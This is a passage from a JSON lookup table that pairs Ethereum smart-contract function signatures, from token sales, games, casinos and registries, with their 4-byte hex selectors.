"payoutBalanceCheck(address,uint256)": "0xfba4abb2", "payoutReferrer()": "0xdd5ac448", "payoutBonuses()": "0x707d5fe1", "setMinBonusTrigger(uint256)": "0x918f5f74", "setVIPThreshold(uint256)": "0x715ed24b", "setInvestorGain(uint256)": "0xdea2356c", "_determineAttack(uint256)": "0x2e8cbf7d", "_determineHitPoints(uint256)": "0x7f9c23e0", "_determineCharacterType(uint256)": "0xb2ebe1c5", "_generateRandomGenes()": "0xeed7128c", "getCharacterTraits(uint256)": "0x9b046ed3", "YouthToken()": "0x442eb683", "ProfToken()": "0xf143ffe9", "unwrapEth()": "0xeafde28c", "changeBonusMultiplier(uint256)": "0x2ef9b5a7", "changePriceContract(address)": "0x5e48379a", "changeWethContract(address)": "0x173a21f8", "changeBZxVault(address)": "0x117f8684", "changeBZRxTokenContract(address)": "0xb21c2a68", "finishLocking()": "0xd85d6d41", "minterTransferFrom(address,address,address,uint256)": "0x89f1c26e", "getDocument(bytes32)": "0xb10d6b41", "newDoc(bytes32,uint256,string)": "0xd9aa5543", "zennitToken()": "0xa7c41e28", "createToken(address,address,address)": "0x2e5ac9b1", "timer()": "0x88c9cb3c", "SingularityTest16()": "0x948a70d7", "addNewSecretHash(bytes32)": "0x718da639", "removeOneSecret(bytes32)": "0xdea01b3e", "getSecretByHash(bytes32)": "0xf8b28c26", "postNewAnswer(bytes32,bytes32)": "0xbe46ee5f", "openSecret(bytes32,bytes32,string)": "0xf683b247", "getRanomSecret()": "0x48338323", "createNewSecret(string,bytes32,bool)": "0x5a8bbba9", "disableAllowBuy()": "0x89ecd0e8", "enableAllowBuy()": "0x3a2524c1", "updatefundendtime(uint256)": "0x0a74a181", "burnTokens(uint256,uint256)": "0x8e81c64d", "sendTokensBulk(address[],uint256[],uint256[])": "0x9b9ce1bc", "sendTokens(address,uint256,uint256)": "0xf06fc103", "addtokensWL(address,uint256,uint256)": "0x58bc3456", "FXTOKEN(address,uint256,uint256)": "0x0d062959", "KakToken(address,uint256)": "0x16ae5607", "ethRec(uint256,uint256,uint256)": "0xe92fdeaa", "getPlayerKeysCount()": "0x866408eb", "setEmeraldPrice(uint256)": "0x18a991f7", "isFundingNeeded(address,address)": "0x5a18f9ff", "_removeCardSetAtIndex(uint256,uint256)": "0xaade53fe", "_randomCardSetIndex(uint256,uint256)": "0x404ae80c", "_randomPack(uint256)": "0xb8bcaad5", "setDefaultBoxNumber(uint256)": "0xcf652d1d", "creditsOf(uint256,address)": "0x890ea91a", "addCredit(uint256,address)": "0x364c7815", "cardNumbersOf(uint256)": "0x74d050fb", "cardSetsInCirculation(uint256)": "0xc61e5be6", "allBoxNumbers()": "0x90af1333", "redeemPack(uint256)": "0x367ad6ea", "addCardSet(uint256,uint256,uint256,bytes32,string,address,uint8)": "0xcdc39f4a", "addBox(uint256,string,string,string,uint256,uint8)": "0x9de6c45b", "withdrawALTokenss(address)": "0x755c020e", "cmct()": "0x729f0e8e", "Daq()": "0x1f67298d", "addData(string)": "0xd4a2498d", "TKCDStandardToken(uint256,string,uint8,string)": "0x1e440e02", "ronerToken()": "0x974463d6", "addDeal(uint256,bytes32,bytes32,uint256,bytes32,bytes32)": "0x4507fccf", "addBudget(uint256,uint256,uint256)": "0x10a80397", "POMCOIN()": "0x43c238db", "transferOwnership(uint256)": "0xd23e8489", "getProposalInfo(uint256)": "0xbc903cb8", "signOwnerCount(uint256)": "0x184fb2bd", "signProposal(uint256)": "0xab273016", "_getRegistry()": "0xe8c8bb52", "getPassportLogicRegistry()": "0x86d5c5f9", "getCurrentPassportLogic()": "0x609725ef", "getCurrentPassportLogicVersion()": "0xba612493", "getPassportLogic(string)": "0x9a1295d9", "_setPendingOwner(address)": "0x6e96dfd7", "_getPendingOwner()": "0x206465f7", "_setOwner(address)": "0xfc201122", "_getOwner()": "0xf7e6af80", "storeUserDataHash(uint256,bytes32)": "0x9a234885", "createUser(address,uint256,bytes32)": "0x4d83ffdd", "F0001Token()": "0xeb068fe5", "SetData(string,string)": "0x4ced0a26", "HashGenerator()": "0x2f078b12", "updateminAmount(uint256)": "0xb236a3c9", "updateEthFee(uint256)": "0x2b0aa1ed", "updatefxFee(uint256)": "0xfabae696", "requestSellforFX(uint256)": "0x703b1411", "requestSellforETH(uint256)": "0xbb7ff992", "requestBuywithFX(uint256)": "0x50699e89", "allocatetokensAndWLExp(address,uint256,uint256)": "0x420ae446", "batchAllocateExp(address[],uint256[],uint256[])": "0x58b5e775", "sendTokensAfterBuyExp(address,uint256,uint256)": "0xcbc91e98", "FXTOKEN(address,uint256)": "0xf63051ff", "_0xForkTokenToken()": "0xa36ddfae", "HybridX()": "0xb4baf9ff", "FiveBalance()": "0x48894ad6", "TrieToken()": "0x1ad11fd1", "addDeal(uint256,string,string,uint256,string,bytes32,string)": "0x68d7e4b5", "FishCoin()": "0xd6cb56e6", "TabooToken()": "0x38a0615f", "getClosingTimeValue()": "0x0f6f72a8", "job(address,address[],uint256)": "0x366859c4", "setCollectionAddress(address,address)": "0xc18bca5f", "presaleRemaining()": "0xa460bd6c", "hardCapInWei()": "0x0ca99ca8", "totalPreICOavailible()": "0x23a08d97", "getDSTSymbol()": "0x54786b4e", "canBurn()": "0xc1eb1840", "NON_VESTED_TEAM_ADVISORS_SHARE()": "0xb832fdde", "lifetimePayouts()": "0x5bdcd0b0", "comB_()": "0x44ab6efa", "whitelisted()": "0x3d9287fa", "totalVested()": "0x199cbc54", "preICOEndTime()": "0xa273738c", "marketaWallet()": "0xca1eb8be", "VUP_PER_ETH_BASE_RATE()": "0x6bef90f8", "koef()": "0xbce2d16d", "startICOStage4()": "0x0ae1fac0", "checkWithdrawalAmount()": "0xb58aa6be", "etherGet()": "0xd75446fe", "PawsCoin()": "0x1e2da3e9", "prizesAwarded()": "0x107a83e2", "lbrsToken()": "0x7ce2432b", "sCVars()": "0xb29e9909", "preallocCoins()": "0x5f33afdb", "holderReserveTokens()": "0x51c221ec", "fiatValueMultiplier()": "0x6621b7be", "TOTAL_ICO_CAP()": "0xc6366ce9", "newUserBonusCardTradable()": "0x59f47523", "open_free()": "0x191ad190", "totalFundingSupply()": "0xa93b5331", "totalWeiExpected()": "0xc52e40d0", "swapProxyTokens()": "0x1fb59f9d", "preicoClosed()": "0x2fb131d4", "receiver3()": "0x5d77aec8", "buybackTypeOne()": "0xd613ac91", "checkGamesReadyForSpinning()": "0x14447e11", "voting_info()": "0x53d73718", "trustee()": "0xfdf97cb2", "selfDestroyTime()": "0xcd1814d7", "canFirstMint()": "0xac60c969", "specialContract()": "0xb770485f", "isKYCRequiredToReceiveFunds()": "0x47a5046a", "PokerWinner()": "0x92fe028b", "TimeTransferAllowed()": "0x7f947168", "globalMax()": "0x93627f42", "sumHardCapICOStage6()": "0x95d8f60d", "RollCount()": "0xe0a3bff7", "endNumber()": "0x089af913", "crowdsaleStartTimestamp()": "0xe5411525", "housePercentOfTotal()": "0x8b2de796", "PHASE_CLOSED()": "0xcc69084f", "lastBlock_f12()": "0x54f47346", "isScheduled()": "0x7ee80d17", "assignedAmountToTheFoundation()": "0x23d6b008", "icoTill()": "0x1e724447", "jackpotLastWinner()": "0x03a168e0", "totalCreatedGame()": "0x88afdeba", "contributorsLockdown()": "0x6206880b", "mainPot()": "0x8f2ee2df", "FOURTH_TIER_SALE_START_TIME()": "0x1616f54a", "FTST()": "0xf17a3c4b", "minTime()": "0x1aa43078", "nextDerivativeTokenTime()": "0x1b841fea", "MAX_TOTAL_TOKEN_AMOUNT_OFFERED_TO_PUBLIC()": "0x336da059", "DOLLAR_DECIMALS_MULTIPLIER()": "0x8857322d", "EGGS_TO_HATCH_1TOAD()": "0x80cda248", "getAllEntityIds()": "0x6069272c", "currentSeller()": "0x30df2c47", "gameStartedAtBlock()": "0x1f2d62bc", "winningsPerRound()": "0x95dd489b", "totalStashedPayouts()": "0xca5a899c", "advisorsTokensVault()": "0xfd82a59f", "jackpotTokenWinRewardRate()": "0x407d552a", "delegateOperation()": "0x8bee241b", "thirty_wallet()": "0xa7f81863", "isTradable()": "0x5074449d", "team_token_percentage_max()": "0x8a7180ae", "requiredDownPayment()": "0xf84a6519", "withdrawnBalance()": "0x154e8152", "finishedMigration()": "0x771d7b47", "getActualPeriod()": "0xb4b54328", "saleRevenue()": "0xb5f16939", "necashToken()": "0x50f71526", "adminsInitialized()": "0xdeca6e76", "atomToken()": "0x36da5cd8", "TOKEN_MAX()": "0xb3508783", "regeneration()": "0x521d56c6", "totalAmountOfOrders()": "0x8df61294", "getObjective()": "0x53a8b307", "lovelock_price()": "0x244eab9e", "notMoreThan()": "0x46c2997a", "crowdSaleFinalized()": "0x73f03d53", "deposits()": "0x323a5e0b", "ccExchangeRate()": "0xbbf3ae00", "totalTokensToTransfer()": "0x34786d1d", "getTopOnce()": "0x1c465e87", "starCoinAddress()": "0x44751e3c", "Saddle_Limit()": "0x9c1817e4", "block5()": "0xad7eb560", "investCommission()": "0x8d976d76", "priceUpdateInterval()": "0x5ffde7be", "LEGAL_EXPENSES_2_TOKENS()": "0x7619d22e", "getMonsterGender()": "0x6827b9db", "getMonsterStats(uint256)": "0xc841df4f", "MonsterCreatorInterface()": "0x5664a5a3", "_addBaseStats(uint256,uint8[8])": "0xbacf5f84", "addBaseStats(uint256,uint8[8])": "0x8ea0926a", "rand(uint16,uint16)": "0xafac8ed3", "MonsterChampionship(address)": "0xc4ecfbbe", "getTopPlayers()": "0x88e814e6", "contestChampion(uint256)": "0x588dadc6", "createPromoMonster(uint256,address)": "0x8b56aff8", "setMonsterAuctionAddress(address,address)": "0x33e665eb", "tokensInAuctionsOfOwner(address)": "0x1a02af40", "MonsterAuction(address,uint256)": "0xed0cdfdb", "_buy(uint256,uint256)": "0x8f0d3b8b", "_isTradeable(uint256)": "0x4c8bae93", "_moveToArea(uint16,address)": "0x5143821e", "_createTrainer(string,uint16,address)": "0x3af242fd", "_createMonster(uint256,address,uint256,bool,bool,bool)": "0x95d2b4b4", "_createArea()": "0xc7cbb9c8", "setMonsterCreatorAddress(address,address)": "0xc74a827c", "HBOToken()": "0xc0926d40", "XstarToken()": "0x4080c884", "BNB()": "0x58f7f6d2", "getCompanyInfo(bytes32)": "0xc7b3b0d4", "setCompanyInfo(bytes32,string)": "0x40acf805", "getInfoPanel()": "0xc573902d", "getBetterNumOfWinnings(address)": "0xd2225635", "getNumOfBettersForMatchAndPrice(uint256,uint256)": "0x90ba0e6c", "getBetterBettingInfo2(address)": "0xc9a56efd", "getBetterBettingInfo(address)": "0x4244e09f", "checkPrizeAlreadyReceived(address,uint256,uint256)": "0x3683b44a", "checkDuplicateMatchId(address,uint256,uint256)": "0xfc8b4a90", "CheckPrivilegeAccomplishment(uint256)": "0xca3fc092", "afterClaim(uint256,uint256,uint256,uint256,uint256)": "0xc8299ed8", "sendCommissionToOwner(uint256)": "0x919f90ca", "claimPrizes(uint256,uint256,uint256,uint256)": "0x8fbd4fa5", "placeBet(uint256,uint256,uint256,uint256)": "0xfde6adb1", "BeggarBetting()": "0x3c53dabe", "Globglogabgalab()": "0xe1b9dea4", "freezeFrom(address,uint256,uint256,uint256)": "0xe5c92020", "IcoContract(address,address,uint256,uint256,uint256,uint256)": "0xbc9c278d", "TimeNow()": "0xb597842a", "BlockICOdatetime()": "0xb67ddf20", "ICOoverTimeStamp()": "0x2091f2d9", "IsICOstarted()": "0x7ed40602", "IsICOrunning()": "0x4b2930d0", "ICOfundsReceiverAddress()": "0x61b930ae", "CurrentICOpublicSupply()": "0x95878da6", "OwnerICOsupply()": "0x39bc91fa", "MaxICOpublicSupply()": "0x2f0dbae1", "OneEtherEqualsInWei()": "0x1fd3dd97", "StartICO()": "0x6a6b8077", "setMainAccount(uint256,address)": "0xdde6f484", "getAccountCap(uint256)": "0x13683532", "getMainAccount(uint256)": "0x11c07649", "raiseCap(uint256,uint256)": "0xf4f0fc21", "mintUptoCap()": "0xa7a604b2", "mintAll(uint256[])": "0x85e5d7ee", "mintUnderCap(uint256,uint256)": "0xe80919d5", "initialCaps()": "0xcef7e760", "changeCongress(address)": "0x60344938", "initialCongress(address)": "0x2253fff1", "LightenToken()": "0x77c2f72e", "totalBuriedValue()": "0x16ea0728", "getNumberOfCapsules()": "0x39a89c1a", "getCapsuleInfo(uint256)": "0x2987ace5", "dig(uint256)": "0x40517083", "bury(uint256)": "0xabf74d5f", "PlanToken()": "0x865891b0", "_createCountry(string,uint256)": "0x650dd4fb", "setJackpotCompleted()": "0x63617328", "setCountryRank(uint256,string,uint256)": "0xb73112e5", "getJackpotTotalValue()": "0x66914614", "getCountry(uint256)": "0xafa5e0a9", "createCountry(string)": "0x7f55b87f", "CountryJackpot()": "0x3fa10e0a", "KRCToken(address)": "0x84beac36", "arrangeUnsoldTokens(address,uint256)": "0x83c6aa47", "allocateAngelTokens(address,uint256)": "0xbd58118f", "MoldCoin(uint256,address)": "0xbb99dec1", "LamboCrowdsale(uint256,uint256,address,address,address[])": "0x104bc708", "LamboPresale(uint256,uint256,uint256,address)": "0xf72d3b15", "acceptContribution(address,uint256)": "0xb1ceb746", "listTiers()": "0x8b5b4228", "availableAmount()": "0x91f7cfb9", "currentTierId()": "0x06e16a36", "getTierId(uint256)": "0x1c6e3899", "calculateContribution(uint256)": "0xf658b1d5", "burnRemains()": "0x00a13901", "scheduleTier(uint256,uint256)": "0x51349d5f", "registerContribution(bytes32,address,uint256)": "0xf8d578f0", "ICOStartPromo()": "0x07d1c4af", "updateETHNZD(uint256)": "0xf80e77d2", "getBonusFactor(uint256,uint256)": "0xf036b592", "erc20TRFT(uint8)": "0x7d4e1353", "PGGamePlatform()": "0x9a9b1709", "Medikia()": "0x395ea0c9", "batchAddAddresses(address[],uint256[])": "0x470d7722", "addAddress(address,uint256)": "0x63c05650", "getContributorData(address)": "0xa789e29c", "logGameData(bytes32[],bytes32[],int256[],uint8,bytes32,bytes32)": "0x0102305b", "updatePlayerBalance(address,int128,int128,uint256)": "0x1a0f518d", "determinePlayer(int128,uint128,uint8,bytes32,bytes32)": "0x42a787fa", "_updateState(address,int128,uint128,uint256)": "0x984e2829", "updateState(int128,uint128,uint8,bytes32,bytes32,bool)": "0xde48ff52", "updateBatch(int128[],uint128[],uint8[],bytes32[],bytes32[],bool)": "0xc97b6d1f", "EdgelessCasino(address,address,uint256,uint256)": "0x24f8fe9c", "credit(address,uint256)": "0xef6506db", "transferToNewContract(address,uint8,bytes32,bytes32,bool)": "0x6bf06fde", "withdrawFor(address,uint256,uint8,bytes32,bytes32)": "0x9607610a", "setWaitingTime(uint256)": "0xebc73e65", "setMaxWithdrawal(uint256)": "0x3926384d", "setMaxDeposit(uint256)": "0xbb371fdd", "withdrawGasPayback()": "0xf66e86bb", "withdrawBankroll(address,uint256)": "0xe9e30746", "cancelWithdrawalRequest()": "0xe714a028", "requestWithdrawal()": "0xdbaf2145", "deposit(address,uint256,bool)": "0x3edd1128", "CasinoBank(uint256,address)": "0x2414b63e", "getGasCost()": "0x7fe3dc2e", "setGasUsage(bytes4[5],uint256[5])": "0x1e33a6d5", "chargingGas(uint256)": "0xbcea7ea0", "disallowReceiver(address)": "0x1ae32b82", "allowReceiver(address)": "0xbb750232", "requiringAuthorization()": "0x8e9e5c37", "closeContract(uint256)": "0xd0ce7360", "mortal(address)": "0xe21316ea", "safeSub(int256,int256)": "0x7af5dc37", "PDPCoin()": "0x4e5ac744", "Generation()": "0x56a3015c", "Doge2Token()": "0xaef093ce", "getKittySkillScore(uint256)": "0xb74d8e58", "race(uint32)": "0x647aac0c", "registerForRace(uint256)": "0x44dc4dec", "getRacer(uint32,uint256)": "0x80e9f98c", "getRace(uint32)": "0x3c3861b6", "setKittyCoreAddress(address)": "0x78a7b804", "setGameOn(bool)": "0x370d4c6e", "setMaxRacers(uint8)": "0xe0ff5d2f", "setRegistrationPeriod(uint8)": "0x38692ca6", "setProcessingFee(uint256)": "0x9461446d", "setEntryFee(uint256)": "0xeb770d0c", "KittyRace(address)": "0xf1f9539f", "RYNOTE()": "0x2c0d4e70", "msc()": "0x9db1b8af", "calculateAllocation(address)": "0x7debb959", "presaleContribute(address,uint256)": "0xa12c7dd8", "PryzeSale(address)": "0x01367751", "onSaleEnded()": "0x27816235", "getContributionLimit(address)": "0x42a6b21a", "setupStages()": "0xf0349d5f", "distributeTimelockedTokens(address,uint256,uint256)": "0xfdd3c1a1", "setupDone()": "0x0a0cd8c8", "setSaleEndTime(uint256)": "0xd132391a", "setSaleStartTime(uint256)": "0x525f8a5c", "Sale(address,uint256)": "0xc6851889", "changeTimestamp(address,uint256,uint256)": "0x3b1fe51b", "setupDisbursement(address,uint256,uint256)": "0x763ffcec", "DisbursementHandler(address)": "0x091cde0b", "PryzeToken()": "0x629b656e", "getStageStartTime(bytes32)": "0xb8ffd53f", "setStageStartTime(bytes32,uint256)": "0xb741cb36", "startConditions(bytes32)": "0x1a787915", "onTransition(bytes32)": "0xf3fde261", "conditionalTransitions()": "0xd525aa32", "getCurrentStageId()": "0xab89f2c7", "StateMachine()": "0xf7a01b93", "TradeNetCoin()": "0x09d89784", "burnBalance()": "0xbc68fad9", "DeepCoinToken()": "0x5de924bf", "setDependencies(address,address,address,address,address,address)": "0x114e6b37", "DOI()": "0x55c9e290", "RaliusToken()": "0xa9f12d8a", "BITWhaleBalance()": "0x9795a644", "winnersPot()": "0x755a11dc", "getTokensPaidToGame(address)": "0xa23c3397", "BITBalanceOf(address)": "0xb14781fb", "DeDeContract(address,uint256)": "0x2a2d78b0", "nullify(address)": "0xdbb72f67", "activate(address)": "0x1c5a9d9c", "issue(uint256,uint256,address,address,uint256,address)": "0x0c36add8", "changeDedeAddress(address)": "0xbd00b0c2", "DeDeMasterContract(address)": "0xaf50e0d3", "INR_Omnidollar()": "0xd1db99b6", "ProdToken()": "0x9733348a", "CommonToken(address,address)": "0x0feacc42", "nextStep()": "0xc9000726", "CnytCoin()": "0x478f7eca", "Marijuana()": "0x8cbb02ad", "EPAchain()": "0x2f401300", "purchaseTokens(uint256,address,address)": "0xeb95d4e6", "sell(uint256,address)": "0x4189a68e", "withdrawForCharity(address)": "0x557119db", "eject()": "0x82e94ac5", "FART()": "0x19154616", "XGoldToken()": "0x9c41e591", "addVesting(address,uint256,uint256)": "0x4691a998", "TokenVault(address)": "0xe3b62158", "calculateBurnAmount()": "0xeee1e7e5", "next(string,string,string,string,string,string)": "0xf9eec610", "diceRollAddress()": "0x050a2eb4", "ART_FOUNDATION_ADDRESS()": "0xfa696d98", "ico_rejected()": "0x84883795", "vestingBeneficiary()": "0x5a129164", "phaseTwoLimit()": "0xa006e0e5", "PRESALE_TOKEN_CAP()": "0xf8f1939d", "proposedTimestamp()": "0x3cf52ffb", "mintBool()": "0x0675cb0b", "getArtworkGroup()": "0x8b833318", "RESERVED_TOKENS_BACE_TEAM()": "0x40111f6d", "maxHardCaphardcap()": "0x8eb179ad", "partnerSaleTokenValue()": "0x3882f333", "platinum()": "0xc937b0a9", "INVESTMENT_USER1()": "0xb1874b99", "bonusStrategy()": "0x331fef86", "leaderBid()": "0xc395a16b", "exporterAcceptedIBankDraft()": "0xa6f935f6", "bonusTokenRateLevelThree()": "0x083ab393", "bountyTokenWithdrawal()": "0x7e43828e", "relocationActive()": "0xde255778", "newVersion()": "0x29cdda23", "commonBudgetAdress()": "0x892250a7", "ddftFund()": "0xd4629ae7", "Withdraw_1()": "0xd028754b", "signingLogic()": "0x44d0afbc", "stakeConfirmed_Eth()": "0xa4659ba2", "tavernContract()": "0xc8ceae12", "accountA()": "0x06867f7d", "_withdraw()": "0xc10eb14d", "minPower_()": "0x93469800", "minimumNumberOfBlocksToEndGame()": "0x43428e45", "FIRST_DAY_END()": "0x0796f97b", "maxRefundStageDuration()": "0xf0a32e7b", "kaliSupply()": "0x1a5e7852", "TEAM_HOLDER()": "0x1358937f", "usdPerEthMin()": "0x2a6d474d", "frozedCount()": "0x8b5a17df", "bountyReward()": "0xa10f43a3", "endFifthWeek()": "0xb27f88fb", "preICORaised()": "0x998a1f96", "giveEthCharityAddress()": "0xb743f7b6", "totalDepositTokenAll()": "0xbfb2fad7", "minSum()": "0xcfec22f8", "crowdsaleBurnAddress()": "0xaa30abf1", "autoSend()": "0x9765b4d7", "numberOfRounds()": "0x3bde045f", "unFreezeTransfer()": "0x0418ac09", "contractUp()": "0xac270c37", "tokenForSPSold()": "0xc1736222", "legacyRepContract()": "0xb85e0aca", "MinimumDeposit()": "0xc635a9f2", "buyItem3()": "0xdf75574a", "tokenTransferAddress()": "0x5a7cb38f", "phase3EndBlock()": "0x899ecf2b", "currentReleaseCeiling()": "0xab179e9f", "launched()": "0x8091f3bf", "minBuyableAmount()": "0x2511b182", "secondStageReserve()": "0xd820ab95", "amountOfDividendsPayouts()": "0x5f46d750", "_coldStorage()": "0x0df3a342", "highTokensToSellGoal()": "0x25d9d57d", "bountyDeposit()": "0x63a66d59", "maintaining()": "0xf5877bdb", "AirRewardmaxTotalSupply()": "0xa901aaa0", "isSaleAuction()": "0xd25c0767", "maxTokensToCreate()": "0x9bd90aae", "totalInsuranceFlows()": "0xc6f664af", "ICO_PRICE1()": "0x6cb5291e", "maxPreSale()": "0xfad3f8f7", "TEAM_SHARE()": "0x05943a15", "barrierPrice()": "0x73383832", "fixed_value()": "0x71cbb22a", "stakeAddress()": "0x85107367", "CROWDSALE_WALLET()": "0x1059c492", "Killer()": "0x15e5ae1e", "gimmePizza()": "0xeb0616e5", "etherAllowance()": "0x3c6c67e2", "etap()": "0x7686cea9", "payedDividendsUSD()": "0xe20cfc4a", "CONTEST_INTERVAL()": "0x924f6be0", "PRICE_BEFORE_SOFTCAP()": "0x3fdcef0d", "icoSpecConfirmed()": "0xc6544e5c", "preSaleTokensAvailable()": "0x687cc2fd", "unlockAdvisorTokens()": "0x7e8ca5f6", "TOKENS_PER_ETHER_EARLYSALE()": "0x0f98c91a", "totalTokensEmitted()": "0x3802d3ef", "totalNormalContributorIdsAllocated()": "0x04d41474", "angelStartTime()": "0xafd7b9ed", "refundsEnabled()": "0x532f1179", "naturalUnit()": "0x42a7cfd5", "allowToWithdrawFromReserve()": "0x8a6b9be4", "hardwareWallet()": "0xe9edf4cd", "balancesDB()": "0x0f5c8c0a", "nextInputProfit()": "0xdc57c323", "isDistConfig()": "0x84922374", "UpdateEtherPriceNow()": "0xacda3e10", "MAX_RANDOM_DELAY()": "0x927f1086", "ecosystemBuildingTokens()": "0x186db237", "upPrice()": "0x50dcce5a", "paymentSupply()": "0x76aad651", "placeMove(uint8)": "0xd2cc7015", "getPosition(uint8)": "0x6f6781d3", "acceptGame()": "0x6268e921", "getGameStatus()": "0x382396ee", "getOpponent()": "0x39580054", "TicTacToeGame()": "0x2e1a348e", "StdInt64(int64)": "0x268efdaf", "StdUInt32(uint32)": "0x4752a3ce", "SatFix(int256,int256,int256)": "0xe5781b71", "releasePremine()": "0x4517a273", "getPreminerAllocation(address,uint256)": "0xed4080b1", "getPreminer(address)": "0xb4d40694", "addPremineAllocation(address,uint256)": "0xb1b6a6ed", "disablePreminer(address,address,address)": "0x9fd859ee", "addPreminer(address,address,uint256,uint256)": "0xfa885868", "Token(uint256,address)": "0x79018524", "testFloatKeyValue()": "0x05862435", "testBoolKeyValue()": "0x99f3487b", "testNegativeIntegerKeyValue()": "0x99a3e03f", "testIntegerKeyValue()": "0xa02c5279", "testLongerJson()": "0xfac647cc", "testStringKeyValue()": "0xf512106a", "setMemberRegistry(address)": "0x6fd7c34c", "isMember(address,address)": "0x39ac7a08", "publishMemberEvent(address,uint256)": "0x88d2faf9", "getMemberData(address,address)": "0xac17d506", "changeMemberAddress(uint256,address)": "0x14d5d892", "isActiveMember(address)": "0x45ecd02f", "unregisterMember(uint256)": "0x23dd523d", "addMember(string,address)": "0x45e39705", "getMemberAddress(uint256)": "0x9029444a", "getPendingWithdrawlListCount()": "0x56b30aec", "startCoinOffering(uint256,uint256,uint256,uint256)": "0x41f70465", "changeFreezeTime(uint256,bool)": "0x9b3e9a48", "invalidatePendingWithdrawl(uint256)": "0x5c72b160", "payoutPendingWithdrawl(uint256)": "0x7b317ef6", "addPendingWithdrawl(uint256,address,bool,bool)": "0x7e1db495", "Vault(address,uint256,uint256)": "0xdd34e7be", "updateContractAddr(string,string,string,string,address)": "0x96023032", "writedb(string,string,string)": "0x87848727", "toWidthString(string,uint256)": "0xab700624", "log(string,address)": "0x319af333", "log(string,int256)": "0x3ca6268e", "log(string,string,string)": "0x2ced7cef", "log(string,string)": "0x4b5c4277", "getErrno()": "0x180db1b4", "OwnerNamed()": "0xd033d277", "GreHackCoin()": "0x17de15ad", "initOwner(address)": "0x0d009297", "FuturOwner()": "0xb6ae90fb", "isAuthorized(bytes32)": "0x62f4ed90", "addMember(uint256,address,bytes32)": "0x1f8f1d21", "createComunity(bytes32,bytes32)": "0x49e0cf2a", "handlePayment(address,uint256)": "0x68ce90ac", "returnIcoInvestments(uint256)": "0x056e25e3", "burn(address,uint128)": "0x7261e469", "setTokensPerWei(uint256)": "0x4d8caa7e", "setPresale(bool)": "0xc54e73e3", "setIcoStart(uint256,uint256)": "0x09a555c0", "contributorCount()": "0xecfd8928", "ctz64(uint64)": "0x1dad202f", "ctz32(uint32)": "0xc9f166f8", "clz64(uint64)": "0xb6bf7318", "clz32(uint32)": "0x9b1d8032", "popcnt64(uint64)": "0x8bc97754", "popcnt32(uint32)": "0xfe95ec9c", "handleALU(uint256,int256,uint256,uint256,uint256,uint256)": "0xca77a6e8", "create(string,string,uint8,uint256,address,string,address,address)": "0xfafbb62b", "Lesson_7(address,uint256)": "0x7e8e13e4", "RealeaseTime()": "0xf784dd61", "allocate()": "0xabaa9916", "Allocations()": "0x4eab3998", "vote(address,bool,string)": "0x835939d5", "submit(address,string,string,string)": "0xe5b9a74c", "getAllowedTokenAt(uint256)": "0x1291ebdd", "getAllowedTokensCount()": "0x15148649", "removeAllowedTokenInternal(address)": "0x62f54c18", "insertAllowedTokenInternal(address)": "0x168bb279", "sHasDownvoted(uint256,uint256,address)": "0x8d1c3b8b", "tHasUpvoted(uint256,address)": "0xaf0a078e", "tMemberSolId(uint256,address)": "0x0fc958dd", "tHasBeenPenalized(uint256,address)": "0x6b3b1d17", "tHasSubmitted(uint256,address)": "0x6cedc6ea", "setPenalizedStatus(uint256,address,bool)": "0x5ce57b50", "setCap(string,uint256)": "0x0f91c8a5", "acceptSolution(uint256,uint256)": "0x08bad193", "voteOnSolution(uint256,uint256,bool)": "0x33849e55", "submitSolution(uint256,string,bytes)": "0x6fc90a2f", "invalidateTaskListingAtIndex(uint256)": "0x92ebf860", "publishRewardlessTaskListing(string,address,uint256,uint256)": "0x3e1a420f", "publishTaskListing(string,address,uint256,uint256,uint256,uint256)": "0x9621bcf7", "TasksHandler(address,uint256,uint256,uint256,uint256)": "0xf031a4d2", "testDiacritcs()": "0xe1541b7d", "testUmlaut()": "0x738228cd", "getPrev(address)": "0xb72703ac", "getNext(address)": "0x765e0159", "getKey(address)": "0x93790f44", "getMaxSize()": "0x63e1d57c", "updateKey(address,uint256,address,address)": "0x3855323f", "insert(address,uint256,address,address)": "0x46f7cf87", "PlusToken()": "0xdaeb1c98", "buyTicket(uint256[],uint256)": "0xbc752b61", "OmnesToken(address,address)": "0x06673ac7", "setAddBonus(uint256,uint256)": "0x212954dc", "changeToCoin(address,address,uint256)": "0xf9f5e8c8", "setMigrateStage()": "0xccbba441", "unlockExternalTransfer()": "0x5b0e52b0", "lockExternalTransfer()": "0x9401d547", "returnTokensFromTeamAddress(uint256)": "0x8a4577ea", "Voronezh()": "0x9060e35d", "callOperator(address,address,address,uint256,bytes,bytes,bool)": "0x6b4e243d", "initialize(string,string,uint256,address,address)": "0x7e77c503", "getIntrospectionRegistry()": "0x5007e47e", "setIntrospectionRegistry(address)": "0x51c40c6f", "getAmountOfUnlockedTokens(address)": "0xbda00866", "lockAndDistributeTokens(address,uint256,uint256,uint256)": "0xfe2a4e62", "madeOperatorForTokens(address,address,address,uint256,bytes,bytes)": "0x32035ca6", "GenkiProject()": "0x62d2c393", "setMaxAppeals(uint256)": "0x10400446", "setAlpha(uint256)": "0x0c17d42c", "setTimePerPeriod(uint256[5])": "0x6cd2f731", "setMinActivatedToken(uint256)": "0x70dd2e06", "setDefaultNumberJuror(uint16)": "0x59f568b9", "setArbitrationFeePerJuror(uint256)": "0x06ea1c02", "executeOrder(bytes32,uint256,address)": "0x0563324c", "isDrawn(uint256,address,uint256)": "0x70d17adb", "getLastSessionVote(uint256,address)": "0xb5040f0a", "getVoteCount(uint256,uint256,uint256)": "0x6c973248", "getWinningCount(uint256,uint256)": "0xe07a31c7", "getWinningChoice(uint256,uint256)": "0xc8860f41", "getVoteRuling(uint256,uint256,uint256)": "0xb3c7618e", "getStakePerDraw()": "0xe59a29a6", "extraDataToNbJurors(bytes)": "0x6973e6db", "executeRuling(uint256)": "0x8bb04875", "validDraws(address,uint256,uint256[])": "0xfe69dacd", "amountJurors(uint256)": "0x2dd40301", "multipleShotTokenRepartition(uint256,uint256)": "0x9313919a", "oneShotTokenRepartition(uint256)": "0xc15a6791", "penalizeInactiveJuror(address,uint256,uint256[])": "0xf55ab987", "voteRuling(uint256,uint256,uint256[])": "0x3f58f8c0", "activateTokens(uint256)": "0x29c8d3ce", "passPeriod()": "0xb241ff03", "saveRN(uint256)": "0xb9a52203", "getUncorrelatedRN(uint256)": "0x1c73601e", "getRN(uint256)": "0xca4742f1", "requestRN(uint256)": "0x7b9c34e0", "Pinakion(address,address,uint256,string,uint8,string,bool)": "0x7cf2f670", "getTokenURI(address)": "0x61c028e7", "mintTicket(address,string)": "0x5388842c", "UNGT()": "0x695e1341", "addCustomSecurityToken(string,string,address,address,string,bytes32)": "0x095408a7", 